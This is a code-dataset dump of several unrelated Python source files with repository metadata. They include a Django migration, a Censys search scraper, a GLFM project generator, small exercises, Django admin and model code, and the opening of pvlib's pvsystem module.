4c0c7ac7b718bacc6312585d3519497ac9c641d9
|
30e81e07a91659a16e84cd04eff20ea4e6a9c6dd
|
refs/heads/main
| 2022-12-13T08:54:50.762224
| 2022-03-22T00:56:16
| 2022-03-22T00:56:16
| 249,777,827
| 1
| 0
| null | 2022-12-08T03:52:48
| 2020-03-24T17:47:39
|
Python
|
UTF-8
|
Python
| false
| false
| 3,597
|
py
|
# Generated by Django 4.0.3 on 2022-03-22 00:33
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations (2022-03-22); do not hand-edit
    # the operations — create a follow-up migration for schema changes.
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        # Customer contact/address record.
        migrations.CreateModel(
            name='ClienteModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nome', models.CharField(max_length=30)),
                ('sobrenome', models.CharField(max_length=30)),
                ('estado', models.CharField(blank=True, max_length=15)),
                ('cidade', models.CharField(blank=True, max_length=20)),
                ('bairro', models.CharField(blank=True, max_length=20)),
                ('rua', models.CharField(blank=True, max_length=100)),
                ('numero_casa', models.CharField(blank=True, max_length=10)),
                ('cep', models.CharField(blank=True, max_length=20)),
                ('telefone', models.IntegerField(blank=True, default=0)),
                ('email', models.EmailField(blank=True, help_text='Ex. clinte@gmail.com', max_length=50)),
            ],
            options={
                'ordering': ['nome', 'sobrenome'],
            },
        ),
        # Pool dimensions / quote record, linked to a customer and a user.
        migrations.CreateModel(
            name='DimensaoModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comprimento', models.FloatField(default=0, help_text='Ex. 8.00', max_length=3)),
                ('largura', models.FloatField(default=0, help_text='Ex. 4.00', max_length=5)),
                ('prof_inicial', models.FloatField(max_length=5)),
                ('prof_final', models.FloatField(default=0, help_text='Ex. 1.40', max_length=3)),
                ('largura_calcada', models.FloatField(blank=True, default=1, help_text='Ex. 1.00', max_length=3)),
                ('espessura', models.CharField(max_length=3)),
                ('fornecedor', models.CharField(max_length=8)),
                ('profundidade_media', models.CharField(default=0, max_length=25)),
                ('area_calcada', models.CharField(max_length=25)),
                ('perimetro', models.CharField(max_length=25)),
                ('m2_facial', models.CharField(max_length=25)),
                ('m2_parede', models.CharField(max_length=25)),
                ('m2_total', models.CharField(max_length=25)),
                ('m3_total', models.CharField(max_length=25)),
                ('m3_real', models.CharField(max_length=25)),
                ('filtro', models.CharField(max_length=30)),
                ('motobomba', models.CharField(max_length=30)),
                ('tampa_casa_maquinas', models.CharField(max_length=30)),
                ('sacos_areia', models.CharField(max_length=30)),
                ('status', models.CharField(blank=True, choices=[('Em negociação', 'Em negociação'), ('Contrato', 'Contrato'), ('Encerrado', 'Encerrado')], default='Em negociação', help_text='Status do Orçamento', max_length=15)),
                ('data', models.DateTimeField(blank=True, null=True)),
                ('cliente', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='dimensoes.clientemodel')),
                ('usuario', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"leopesi@yahoo.com.br"
] |
leopesi@yahoo.com.br
|
fb77ea07cc1f0e776b2b58f3e6ea4ece9b9419b9
|
6afa0b5bc5c50ed4d90800a7eae118976f47d9f7
|
/lib/core/engines/censys.py
|
0d731cd7f784d2438bda73d08c19472683a81a64
|
[] |
no_license
|
qq431169079/webHunter
|
7efccb39cc4e91d8eae2e25ded0a24c3084bab92
|
bc3cbed64ef71b6fac4c209797c222c8768f4723
|
refs/heads/master
| 2020-04-24T22:37:09.512532
| 2016-01-18T04:21:57
| 2016-01-18T04:21:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,809
|
py
|
#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
import thirdparty.requests as requests
from lib.core.engines import Engine
from lib.core.engines import EngineError
from lib.core.engines import EngineConnectionError
from lib.utils.agents import random_user_agent
from lib.utils.common import dict2query
from lib.utils.common import query2dict
from lib.utils.common import patch_url
from lib.parse.confparse import conf
_NAME = 'Censys'
_SITE = 'https://www.censys.io/'
_DESC = ('Censys Search, a search engine that allows computer scientists to '
         'ask questions about the devices and networks that compose the Internet.')


class Censys(Engine):
    """Search-engine driver for censys.io.

    Pages through domain/ipv4 search results over a shared requests.Session,
    yielding the raw HTML of each result page.

    Fixes applied: Python-2-only `except Exception, ex` syntax, two broken
    `except any:` handlers (the builtin `any` is not an exception class, so
    a triggered handler would itself raise TypeError), and a urljoin call
    that passed a single tuple instead of (base, url).
    """

    def __init__(self):
        self.maximum = 1000  # hard cap on results we will ever page through
        self.pmax = 25       # results per page on censys.io
        self.sreq = requests.Session()
        self.sreq.headers['User-Agent'] = random_user_agent()
        super(Censys, self).__init__(_NAME, _SITE, _DESC)

    def _init(self):
        """Probe the site once; raise EngineConnectionError when unreachable."""
        try:
            self.sreq.get(self._site)
        except Exception as ex:
            err = 'Failed to connect "%s", ' % self._site
            err += str(ex)
            raise EngineConnectionError(err)

    def _is_over_limit(self, link, limit):
        # NOTE(review): despite its name this returns True while the link is
        # still WITHIN the limit — it is used as the keep-paging condition.
        q = urlparse.urlparse(link).query
        d = query2dict(q)
        return (int(d['page']) * int(self.pmax)) <= limit

    @staticmethod
    def _fetch_next_page(prev_link, content):
        """Extract the next-page link for prev_link from a result page's HTML."""
        q = urlparse.urlparse(prev_link).query
        d = query2dict(q)
        prev_page = d.get('page', '')
        if prev_page:
            match = re.search(r'<a href=(?P<next>[^">]*)>' + str(int(prev_page)+1) + r'</a>', content)
            next_link = match.group('next') if match else ''
            next_link = patch_url(prev_link, next_link)
        else:
            next_link = ''
        return next_link

    def _fetch_page_content(self, link):
        """Fetch one page, returning '' on any request failure."""
        try:
            content = self.sreq.get(link).content
        except Exception:  # was "except any:" — see class docstring
            content = ''
        return content

    def _process_redirection(self, res):
        # TODO
        pass

    def search(self, keyword, limit, search_type=''):
        """Yield raw result-page HTML for *keyword* up to *limit* results.

        search_type may be 'ipv4' or 'domain' (default: 'domain').
        NOTE(review): the loop advances the link before yielding, so the
        final page's content is dropped when no next link exists — confirm
        intended.
        """
        self._init()
        try:
            self._login()  # best-effort; anonymous search still works
        except Exception:  # was "except any:" — see class docstring
            pass
        if limit > self.maximum:
            limit = self.maximum
        d = {
            'q': keyword,
            'page': str(1),
        }
        q = dict2query(d)
        if search_type in ['ipv4', 'domain']:
            # Bug fix: urljoin was called with one tuple argument, which
            # raises at runtime; base and relative URL are separate args.
            link = urlparse.urljoin(self._site, ('/%s?' % search_type) + q)
        else:
            link = urlparse.urljoin(self._site, '/domain?' + q)
        while self._is_over_limit(link, limit):
            print(link)
            content = self._fetch_page_content(link)
            link = self._fetch_next_page(link, content)
            if not link:
                break
            yield content

    def _login(self):
        """Log in using credentials from the [censys] section of the config."""
        username = conf.get('censys', 'username')
        password = conf.get('censys', 'password')

        def fetch_csrf_token(login_url):
            # Scrape the CSRF token and came_from fields off the login form.
            _res = self.sreq.get(login_url)
            match = re.search(r'name="csrf_token" value="(?P<csrf_token>[^">].*)"', _res.content)
            _csrf_token = match.group('csrf_token') if match else ''
            match = re.search(r'name="came_from" value= "(?P<came_from>[^">].*)"', _res.content)
            _came_from = match.group('came_from') if match else ''
            return _csrf_token, _came_from

        i_url = 'https://www.censys.io/login'
        csrf_token, came_from = fetch_csrf_token(i_url)
        if csrf_token and came_from:
            post = {
                'csrf_token': csrf_token,
                'came_from': came_from,
                'login': username,
                'password': password
            }
            self.sreq.post(i_url, data=post)
|
[
"rickchen.vip@gmail.com"
] |
rickchen.vip@gmail.com
|
afa1946040cf0c093e0c91e5c89128b08e964dd3
|
ac62bd27af62efb8d8310a71016532d9b9177e54
|
/new_project.py
|
1375c03b01eb07afd5a0b68b8cf87cfa1bd233c8
|
[
"Zlib"
] |
permissive
|
lilingfeng-2016/glfm
|
fcd840da07fdcaa6141d3d0f28b78a1c24b53e8d
|
3b62129e519eba758cc42e3da08ec12ff214a70a
|
refs/heads/master
| 2021-01-11T18:45:06.292753
| 2017-01-15T21:21:43
| 2017-01-15T21:21:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,099
|
py
|
#!/usr/bin/python
import getpass, os, re, shutil, sys
print ""
print "Create a new GLFM project"
print ""
#
# Gets a line of input. The input is stripped of spaces.
# If the input is empty, default_value is returned
#
#
# Gets a line of input. The input is stripped of spaces.
# If the input is empty, default_value is returned
#
def get_input(prompt, default_value):
    reply = raw_input(prompt + " [" + default_value + "]: ")
    if not reply:
        return default_value
    reply = reply.strip()
    # An all-whitespace reply also falls back to the default.
    return reply if reply else default_value
def name_safe(value):
    # True when value contains only letters, digits, and underscores
    # (an empty string also matches, mirroring the original pattern).
    pattern = r'^[a-zA-Z\d_]*$'
    return re.match(pattern, value) is not None
def package_safe(value):
    """Return True when *value* is a valid dotted Java-style package name."""
    # Pattern from http://stackoverflow.com/questions/5205339/regular-expression-matching-fully-qualified-java-classes
    qualified_name = r'^([a-zA-Z_$][a-zA-Z\d_$]*\.)*[a-zA-Z_$][a-zA-Z\d_$]*$'
    return re.match(qualified_name, value) is not None
#
# Read EMSCRIPTEN_ROOT from ~/.emscripten
#
dot_emscripten = os.path.expanduser("~/.emscripten")
if os.path.exists(dot_emscripten):
    # NOTE(review): exec() runs arbitrary code from the user's ~/.emscripten
    # config file — acceptable for a local dev tool, but worth confirming.
    exec(open(dot_emscripten, 'r').read())
if 'EMSCRIPTEN_ROOT' in globals():
    # The emsdk root is two directory levels above the emscripten compiler dir.
    emsdk_path = os.path.dirname(os.path.dirname(EMSCRIPTEN_ROOT))
else:
    print "Warning: Emscripten does not appear to be installed"
    emsdk_path = "~/emsdk_portable"
#
# Get project variables
#
# Re-prompt until the app name contains only [A-Za-z0-9_].
while True:
    app_name = get_input("App name (without spaces)", "GLFMApp")
    if name_safe(app_name):
        break
    else:
        print "Illegal name! The app name can only contain letters, numbers, and an underscore."
# Re-prompt until the package name is a valid dotted identifier.
while True:
    package_name = get_input("App package name", "com." + getpass.getuser() + "." + app_name)
    if package_safe(package_name):
        break
    else:
        print "Illegal package name! The app name can only contain letters and numbers,"
        print "and each component must start with a letter."
emsdk_path = get_input("Emscripten emsdk path", emsdk_path)
#
# Find a default output dir that doesn't already exist (so that nothing is overridden)
#
output_dir = "../" + app_name
output_dir_n = 1
while os.path.exists(output_dir):
output_dir_n += 1
output_dir = "../" + app_name + `output_dir_n`
output_dir = get_input("Project path", output_dir)
print ""
if os.path.exists(output_dir):
print "Project path '" + output_dir + "' already exists. Exiting."
exit(1)
#
# Confirm creation
#
print "Project summary:"
print " App name:", app_name
print " App package name:", package_name
print " Emscripten emsdk path:", emsdk_path
print " Project path:", output_dir
confirm = get_input("Create (y/n)?", "y")
# Anything other than y/Y aborts before touching the filesystem.
if confirm != "Y" and confirm != "y":
    print ""
    print "Project creation canceled"
    exit(1)
####################################################################################################

# OS cruft files never copied into the generated project.
ignored_files = (".DS_Store", "Thumbs.db", "Desktop.ini")
# Build outputs and IDE state directories skipped by copy_template().
ignored_paths = (
    "example/platform/android/app/build",
    "example/platform/android/.gradle",
    "example/platform/android/.idea",
    "example/platform/emscripten/bin",
    "example/platform/ios/GLFMExample.xcodeproj/project.xcworkspace",
    "example/platform/ios/GLFMExample.xcodeproj/xcuserdata",
)
def do_name_replace(s):
    """Substitute the template app name with the user's chosen app name."""
    return s.replace("GLFMExample", app_name)
def do_replace(s):
    """Substitute the template app name and package identifiers in *s*."""
    substitutions = (
        ("GLFMExample", app_name),
        ("com.brackeen.glfmexample", package_name),
        ("com.brackeen.${PRODUCT_NAME:rfc1034identifier}", package_name),
    )
    for old, new in substitutions:
        s = s.replace(old, new)
    return s
def copy_android_buildfile(src_file, dst_file):
    """Copy an Android build file, repointing GLFM paths and substituting names."""
    # Destination is opened first, matching the original error behavior.
    with open(dst_file, "wt") as fout, open(src_file, "rt") as fin:
        for line in fin:
            line = line.replace("../../../../include", "../../../glfm/include")
            line = line.replace("../../../../src", "../../../glfm/src")
            fout.write(do_replace(line))
def copy_emscripten_makefile(src_file, dst_file):
    """Copy the Emscripten Makefile, pinning GLFM_ROOT/APP_ROOT to the new layout."""
    overrides = (
        ("GLFM_ROOT :=", "GLFM_ROOT := ../../glfm\n"),
        ("APP_ROOT :=", "APP_ROOT := ../..\n"),
    )
    with open(dst_file, "wt") as fout, open(src_file, "rt") as fin:
        for line in fin:
            for prefix, replacement in overrides:
                if line.startswith(prefix):
                    fout.write(replacement)
                    break
            else:
                # No override matched; apply the normal name substitutions.
                fout.write(do_replace(line))
def copy_ios_project_file(src_file, dst_file):
    """Copy the Xcode project file, repointing its GLFM path reference."""
    with open(dst_file, "wt") as fout, open(src_file, "rt") as fin:
        for raw_line in fin:
            fixed = raw_line.replace("path = ../../..;", "path = ../../glfm;")
            fout.write(do_replace(fixed))
def copy_generic_project_file(src_file, dst_file):
    """Copy a text project file, applying the standard name/package substitutions."""
    with open(dst_file, "wt") as fout, open(src_file, "rt") as fin:
        fout.writelines(do_replace(line) for line in fin)
def copy_template(src_dir, dst_dir):
    """Recursively copy a template tree into the new project.

    Directories listed in ``ignored_paths`` and files listed in
    ``ignored_files`` are skipped.  Known project files are rewritten by the
    dedicated copy_* helpers; everything else is copied verbatim.  File names
    themselves also receive the app-name substitution.
    """
    if src_dir in ignored_paths:
        return
    if not os.path.exists(dst_dir):
        os.makedirs(dst_dir)
    for entry in os.listdir(src_dir):
        if entry in ignored_files:
            continue
        src = os.path.join(src_dir, entry)
        dst = os.path.join(dst_dir, do_name_replace(entry))
        if os.path.isdir(src):
            copy_template(src, dst)
        elif os.path.isfile(src):
            if entry == "Makefile":
                copy_emscripten_makefile(src, dst)
            elif entry == "build.gradle":
                copy_android_buildfile(src, dst)
            elif entry == "project.pbxproj":
                copy_ios_project_file(src, dst)
            elif (entry in ("AndroidManifest.xml", "strings.xml")
                  or entry.endswith(".plist") or entry.endswith(".java")):
                copy_generic_project_file(src, dst)
            else:
                shutil.copy2(src, dst)
os.makedirs(output_dir)

# Copy GLFM
shutil.copytree("include", output_dir + "/glfm/include")
shutil.copytree("src", output_dir + "/glfm/src")

# Copy example
shutil.copytree("example/src", output_dir + "/src")
shutil.copytree("example/assets", output_dir + "/assets")

# Copy project files
copy_template("example/platform/android", output_dir + "/platform/android");
copy_template("example/platform/emscripten", output_dir + "/platform/emscripten");

# iOS: package names require dash instead of underscore
# NOTE: do_replace() reads the module-global package_name, so this mutation
# affects only the iOS copy below (the Android/Emscripten copies already ran).
package_name = package_name.replace("_", "-")
copy_template("example/platform/ios", output_dir + "/platform/ios");

# Special case: create a Makefile.local for emscripten
with open(output_dir + "/platform/emscripten/Makefile.local", "wt") as fout:
    fout.write("EMSCRIPTEN_PATH = " + emsdk_path)

# Woop!
print ""
print "Done."
|
[
"brackeen@gmail.com"
] |
brackeen@gmail.com
|
c6156546305358f3903c211d335238a40cae8906
|
19c4de6bfbd8536aeb323b52fa54d9b73a0efe5f
|
/for.py
|
191ae0a262fcc8a252b1dac8c44825be9989bbe2
|
[] |
no_license
|
GiovanniSinosini/cycle_condictions
|
a39e51ada7931342e51200a2adc3268506d7cc94
|
7ee645668e8f376a8570d9a90a7d253cbe021ecc
|
refs/heads/master
| 2021-02-08T05:52:10.505497
| 2020-03-01T08:54:03
| 2020-03-01T08:54:03
| 244,116,120
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
def main():
    """Print a countdown from 10 to 1, one number per line."""
    # The commented-out multiplication-table exercise that used to live here
    # was dead code and has been removed.
    for i in range(10, 0, -1):
        print(i)


main()
|
[
"carvalho.sino@gmail.com"
] |
carvalho.sino@gmail.com
|
b3eadaa9fcf766d67cddeb553303e33ebfc63f42
|
b696b2e86ba95f2922383c8e7cf59aa6939e2196
|
/polls/models.py
|
a9494fae6072be3fa41db3e82b1fa2c74834b5c5
|
[] |
no_license
|
Ihsara/form_example_django
|
14756d7a7b0ad2de5dd0b0b815c45c27e7fce334
|
bce7d454e142a1c1f10600251ccc95488f3035ff
|
refs/heads/master
| 2020-05-03T12:43:40.524198
| 2019-03-31T02:52:06
| 2019-03-31T02:52:06
| 178,634,179
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
import datetime
from django.db import models
from django.utils import timezone
class Question(models.Model):
    # Poll question text shown to voters.
    question_text = models.CharField(max_length=200)
    # Publication timestamp ('date published' is the admin-facing label).
    pub_date = models.DateTimeField('date published')

    def __str__(self):
        return self.question_text
class Choice(models.Model):
    # Parent question; deleting the question cascades to its choices.
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    choice_text = models.CharField(max_length=200)
    # Vote tally, starts at zero.
    votes = models.IntegerField(default=0)

    def __str__(self):
        return self.choice_text

    def was_published_recently(self):
        # NOTE(review): Choice declares no pub_date field above, so
        # self.pub_date would raise at runtime — in the standard Django
        # tutorial this method belongs on Question; confirm intended owner.
        # Also note the comparison is True for pub_date values in the future.
        return self.pub_date >= timezone.now() - datetime.timedelta(days=1)
|
[
"longchau21@gmail.com"
] |
longchau21@gmail.com
|
840c1e455245c805ebe1b93b7d10959995f0bd81
|
d030630f6579d836243b794c6769af0452e03f22
|
/Notes/Workshop_0/Exercise - Number Guessing Game.py
|
f277f0fbccb3776e503cc5cafc4dfc6fd5dc57fd
|
[] |
no_license
|
LinesKing/System-Optimisation-Machine-Learning-ELEN90088_2021_SM1
|
6625de1d99f7d4cdc25ced6346aa4f59f0e9c59e
|
f7c65df658e7fe66c63d4ed35071ff13ad2b6a5f
|
refs/heads/main
| 2023-06-25T03:22:20.503772
| 2021-07-29T02:20:53
| 2021-07-29T02:20:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 990
|
py
|
import random
# Binary-search a random target in [0, 1) until the guess is within tolerance.
target = random.random()
print("target= {}".format(target))

# Renamed from max/min: those names shadowed the builtins.
high = 1  # current upper bound of the search interval
low = 0   # current lower bound of the search interval
guess = (high + low) / 2  # first guess: midpoint
count = 0  # number of guesses made so far
tolerance = 1.0e-06  # stop criterion, mimicking a solver's convergence test
bias = abs(target - guess)  # current guessing error

while bias > tolerance:
    if guess < target:
        print("guess {} = {} is smaller than target".format(count, guess))
        low = guess  # target lies above the guess: raise the lower bound
        guess = (guess + high) / 2
    else:
        print("guess {} = {} is bigger than target".format(count, guess))
        high = guess  # target lies below the guess: lower the upper bound
        guess = (low + guess) / 2
    # Bookkeeping shared by both branches (was duplicated in each).
    count += 1
    bias = abs(target - guess)

print("Total guessing times are {}".format(count))
|
[
"lineslk97@gmail.com"
] |
lineslk97@gmail.com
|
245bea7ae2c8f01f18c4cbc04c206d1ac32509b4
|
f7b935819a37b944ae160cad3faba042c477196b
|
/movie/admin.py
|
e2f054cef92f7722f9218de2691fcc2c44ef3bdf
|
[] |
no_license
|
greyfivenine/cinemasite
|
d98e7d6a4ff41002c4dc7add92301a23fe0354b5
|
bf1ae48d48c26d5eb7bf2db4e993642ac42d2376
|
refs/heads/master
| 2020-05-23T22:37:34.771285
| 2019-05-16T09:21:15
| 2019-05-16T09:21:15
| 186,977,537
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,501
|
py
|
from django.contrib import admin
from .models import Movie, About, Comment, Schedule, Place
from .forms import AdminScheduleForm
# Register your models here.
class CommentFilter(admin.SimpleListFilter):
    """Admin sidebar filter: narrow comments to a single released movie."""
    title = 'Фильм'
    parameter_name = 'movie_slug'

    def lookups(self, request, model_admin):
        # A queryset is directly iterable — the former set([m for m in qs])
        # wrapped it in a redundant list comprehension.
        movies = set(Movie.objects.filter(soon=False))
        return [(m.slug, m.title) for m in movies]

    def queryset(self, request, queryset):
        # Returning None (no selection) leaves the queryset unfiltered.
        if self.value():
            return queryset.filter(comment_film__slug__iexact=self.value())
class PlaceFilter(admin.SimpleListFilter):
    """Admin sidebar filter: narrow seats to a single released movie."""
    title = 'Фильм'
    parameter_name = 'movie_slug'

    def lookups(self, request, model_admin):
        # Querysets are iterable; no intermediate list comprehension needed.
        movies = set(Movie.objects.filter(soon=False))
        return [(m.slug, m.title) for m in movies]

    def queryset(self, request, queryset):
        # Returning None (no selection) leaves the queryset unfiltered.
        if self.value():
            return queryset.filter(schedule__movie_name__slug__iexact=self.value())
# Inline editor so schedules can be managed directly on the Movie admin page.
class ScheduleInline(admin.TabularInline):
    model = Schedule
class MovieAdmin(admin.ModelAdmin):
    # NOTE(review): ModelAdmin does not consume an inner Meta class the way
    # forms/models do — this block appears to be a no-op; confirm.
    class Meta:
        model = Movie
    # Auto-fill the slug from the title while typing in the admin form.
    prepopulated_fields = {'slug': ('title',)}
    list_display = ['title', 'country', 'genre', 'duration', 'soon']
    inlines = [
        ScheduleInline,
    ]
class CommentAdmin(admin.ModelAdmin):
    # NOTE(review): inner Meta on a ModelAdmin is likely a no-op; confirm.
    class Meta:
        model = Comment
    list_display = ['comment_author', 'comment_film', 'comment_date']
    list_filter = (CommentFilter, 'comment_author',)
class ScheduleAdmin(admin.ModelAdmin):
    # NOTE(review): inner Meta on a ModelAdmin is likely a no-op; confirm.
    class Meta:
        model = Schedule
    # Custom admin form imported from .forms.
    form = AdminScheduleForm
    list_display = ['movie_name', 'movie_date', 'movie_price', 'movie_format']
class PlaceAdmin(admin.ModelAdmin):
    # NOTE(review): inner Meta on a ModelAdmin is likely a no-op; confirm.
    class Meta:
        model = Place
    list_filter = (PlaceFilter, 'hall_row', 'hall_place',)
    # The '=' prefix requests exact-match search on row/seat numbers.
    search_fields = ['schedule__movie_name__title', '=hall_row', '=hall_place']
    list_display = ['get_movie_name', 'get_movie_date', 'hall_row', 'hall_place', 'is_bought']

    def get_movie_name(self, obj):
        # Changelist column: movie title reached via the related schedule.
        return obj.schedule.movie_name.title
    get_movie_name.short_description = 'Название фильма'

    def get_movie_date(self, obj):
        # Changelist column: showing date reached via the related schedule.
        return obj.schedule.movie_date
    get_movie_date.short_description = 'Дата сеанса'
# Wire the models into the Django admin site (About uses the default admin).
admin.site.register(Movie, MovieAdmin)
admin.site.register(About)
admin.site.register(Comment, CommentAdmin)
admin.site.register(Schedule, ScheduleAdmin)
admin.site.register(Place, PlaceAdmin)
|
[
"mustakimov.99@gmail.com"
] |
mustakimov.99@gmail.com
|
1f44c10841bb3f121b2f3a9f454497acd09bae7b
|
e1d7a04507712e69408a7ae1ec33061bd4c691db
|
/venv/Lib/site-packages/pvlib/pvsystem.py
|
8a20e5fdeff9c954edd7dbbb4611731e94ac306b
|
[] |
no_license
|
Mervolt/pp
|
5d0d70e6e70004284816cae37eac038332a892fe
|
ce0371c79183af8bb3856671aad5b55a81380b4c
|
refs/heads/master
| 2023-06-25T19:17:27.756515
| 2021-07-31T23:04:10
| 2021-07-31T23:04:10
| 363,100,023
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 85,009
|
py
|
"""
The ``pvsystem`` module contains functions for modeling the output and
performance of PV modules and inverters.
"""
from collections import OrderedDict
import io
import os
from urllib.request import urlopen
import warnings
import numpy as np
import pandas as pd
from pvlib._deprecation import deprecated
from pvlib import (atmosphere, iam, inverter, irradiance,
singlediode as _singlediode, temperature)
from pvlib.tools import _build_kwargs
from pvlib.location import Location
from pvlib._deprecation import pvlibDeprecationWarning
# Required module_parameters keys for each supported DC power model,
# keyed by the model's name.
_DC_MODEL_PARAMS = {
    'sapm': {
        'A0', 'A1', 'A2', 'A3', 'A4', 'B0', 'B1', 'B2', 'B3',
        'B4', 'B5', 'C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6',
        'C7', 'Isco', 'Impo', 'Voco', 'Vmpo', 'Aisc', 'Aimp', 'Bvoco',
        'Mbvoc', 'Bvmpo', 'Mbvmp', 'N', 'Cells_in_Series',
        'IXO', 'IXXO', 'FD'},
    'desoto': {
        'alpha_sc', 'a_ref', 'I_L_ref', 'I_o_ref',
        'R_sh_ref', 'R_s'},
    'cec': {
        'alpha_sc', 'a_ref', 'I_L_ref', 'I_o_ref',
        'R_sh_ref', 'R_s', 'Adjust'},
    'pvsyst': {
        'gamma_ref', 'mu_gamma', 'I_L_ref', 'I_o_ref',
        'R_sh_ref', 'R_sh_0', 'R_s', 'alpha_sc', 'EgRef',
        'cells_in_series'},
    'singlediode': {
        'alpha_sc', 'a_ref', 'I_L_ref', 'I_o_ref',
        'R_sh_ref', 'R_s'},
    'pvwatts': {'pdc0', 'gamma_pdc'}
}
def _combine_localized_attributes(pvsystem=None, location=None, **kwargs):
"""
Get and combine attributes from the pvsystem and/or location
with the rest of the kwargs.
"""
if pvsystem is not None:
pv_dict = pvsystem.__dict__
else:
pv_dict = {}
if location is not None:
loc_dict = location.__dict__
else:
loc_dict = {}
new_kwargs = dict(
list(pv_dict.items()) + list(loc_dict.items()) + list(kwargs.items())
)
return new_kwargs
# not sure if this belongs in the pvsystem module.
# maybe something more like core.py? It may eventually grow to
# import a lot more functionality from other modules.
class PVSystem:
"""
The PVSystem class defines a standard set of PV system attributes
and modeling functions. This class describes the collection and
interactions of PV system components rather than an installed system
on the ground. It is typically used in combination with
:py:class:`~pvlib.location.Location` and
:py:class:`~pvlib.modelchain.ModelChain`
objects.
The class supports basic system topologies consisting of:
* `N` total modules arranged in series
(`modules_per_string=N`, `strings_per_inverter=1`).
* `M` total modules arranged in parallel
(`modules_per_string=1`, `strings_per_inverter=M`).
* `NxM` total modules arranged in `M` strings of `N` modules each
(`modules_per_string=N`, `strings_per_inverter=M`).
The class is complementary to the module-level functions.
The attributes should generally be things that don't change about
the system, such the type of module and the inverter. The instance
methods accept arguments for things that do change, such as
irradiance and temperature.
Parameters
----------
surface_tilt: float or array-like, default 0
Surface tilt angles in decimal degrees.
The tilt angle is defined as degrees from horizontal
(e.g. surface facing up = 0, surface facing horizon = 90)
surface_azimuth: float or array-like, default 180
Azimuth angle of the module surface.
North=0, East=90, South=180, West=270.
albedo : None or float, default None
The ground albedo. If ``None``, will attempt to use
``surface_type`` and ``irradiance.SURFACE_ALBEDOS``
to lookup albedo.
surface_type : None or string, default None
The ground surface type. See ``irradiance.SURFACE_ALBEDOS``
for valid values.
module : None or string, default None
The model name of the modules.
May be used to look up the module_parameters dictionary
via some other method.
module_type : None or string, default 'glass_polymer'
Describes the module's construction. Valid strings are 'glass_polymer'
and 'glass_glass'. Used for cell and module temperature calculations.
module_parameters : None, dict or Series, default None
Module parameters as defined by the SAPM, CEC, or other.
temperature_model_parameters : None, dict or Series, default None.
Temperature model parameters as defined by the SAPM, Pvsyst, or other.
modules_per_string: int or float, default 1
See system topology discussion above.
strings_per_inverter: int or float, default 1
See system topology discussion above.
inverter : None or string, default None
The model name of the inverters.
May be used to look up the inverter_parameters dictionary
via some other method.
inverter_parameters : None, dict or Series, default None
Inverter parameters as defined by the SAPM, CEC, or other.
racking_model : None or string, default 'open_rack'
Valid strings are 'open_rack', 'close_mount', and 'insulated_back'.
Used to identify a parameter set for the SAPM cell temperature model.
losses_parameters : None, dict or Series, default None
Losses parameters as defined by PVWatts or other.
name : None or string, default None
**kwargs
Arbitrary keyword arguments.
Included for compatibility, but not used.
See also
--------
pvlib.location.Location
pvlib.tracking.SingleAxisTracker
"""
def __init__(self,
surface_tilt=0, surface_azimuth=180,
albedo=None, surface_type=None,
module=None, module_type=None,
module_parameters=None,
temperature_model_parameters=None,
modules_per_string=1, strings_per_inverter=1,
inverter=None, inverter_parameters=None,
racking_model=None, losses_parameters=None, name=None,
**kwargs):
self.surface_tilt = surface_tilt
self.surface_azimuth = surface_azimuth
# could tie these together with @property
self.surface_type = surface_type
if albedo is None:
self.albedo = irradiance.SURFACE_ALBEDOS.get(surface_type, 0.25)
else:
self.albedo = albedo
# could tie these together with @property
self.module = module
if module_parameters is None:
self.module_parameters = {}
else:
self.module_parameters = module_parameters
self.module_type = module_type
self.racking_model = racking_model
if temperature_model_parameters is None:
self.temperature_model_parameters = \
self._infer_temperature_model_params()
else:
self.temperature_model_parameters = temperature_model_parameters
self.modules_per_string = modules_per_string
self.strings_per_inverter = strings_per_inverter
self.inverter = inverter
if inverter_parameters is None:
self.inverter_parameters = {}
else:
self.inverter_parameters = inverter_parameters
if losses_parameters is None:
self.losses_parameters = {}
else:
self.losses_parameters = losses_parameters
self.name = name
if kwargs:
warnings.warn(
'Arbitrary PVSystem kwargs are deprecated and will be '
'removed in v0.9', pvlibDeprecationWarning
)
def __repr__(self):
attrs = ['name', 'surface_tilt', 'surface_azimuth', 'module',
'inverter', 'albedo', 'racking_model', 'module_type',
'temperature_model_parameters']
return ('PVSystem:\n ' + '\n '.join(
f'{attr}: {getattr(self, attr)}' for attr in attrs))
def get_aoi(self, solar_zenith, solar_azimuth):
"""Get the angle of incidence on the system.
Parameters
----------
solar_zenith : float or Series.
Solar zenith angle.
solar_azimuth : float or Series.
Solar azimuth angle.
Returns
-------
aoi : Series
The angle of incidence
"""
aoi = irradiance.aoi(self.surface_tilt, self.surface_azimuth,
solar_zenith, solar_azimuth)
return aoi
def get_irradiance(self, solar_zenith, solar_azimuth, dni, ghi, dhi,
dni_extra=None, airmass=None, model='haydavies',
**kwargs):
"""
Uses the :py:func:`irradiance.get_total_irradiance` function to
calculate the plane of array irradiance components on a tilted
surface defined by ``self.surface_tilt``,
``self.surface_azimuth``, and ``self.albedo``.
Parameters
----------
solar_zenith : float or Series.
Solar zenith angle.
solar_azimuth : float or Series.
Solar azimuth angle.
dni : float or Series
Direct Normal Irradiance
ghi : float or Series
Global horizontal irradiance
dhi : float or Series
